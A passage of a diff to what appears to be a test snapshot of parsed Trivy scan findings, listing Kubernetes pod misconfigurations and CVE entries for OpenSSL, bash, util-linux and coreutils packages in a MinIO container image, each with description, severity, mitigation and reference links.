"https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", ], }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2022-3715", + "installedVersion": "5.1-2+deb11u1", + "packageName": "bash", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/errata/RHSA-2023:0340", + "https://access.redhat.com/security/cve/CVE-2022-3715", + "https://bugzilla.redhat.com/2126720", + "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "https://errata.rockylinux.org/RLSA-2023:0340", + "https://linux.oracle.com/cve/CVE-2022-3715.html", + "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "https://www.cve.org/CVERecord?id=CVE-2022-3715", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "a heap-buffer-overflow in valid_parameter_transform", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://avd.aquasec.com/nvd/cve-2022-3715", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://access.redhat.com/errata/RHSA-2023:0340", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2022-3715", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/2126720", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://errata.rockylinux.org/RLSA-2023:0340", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + 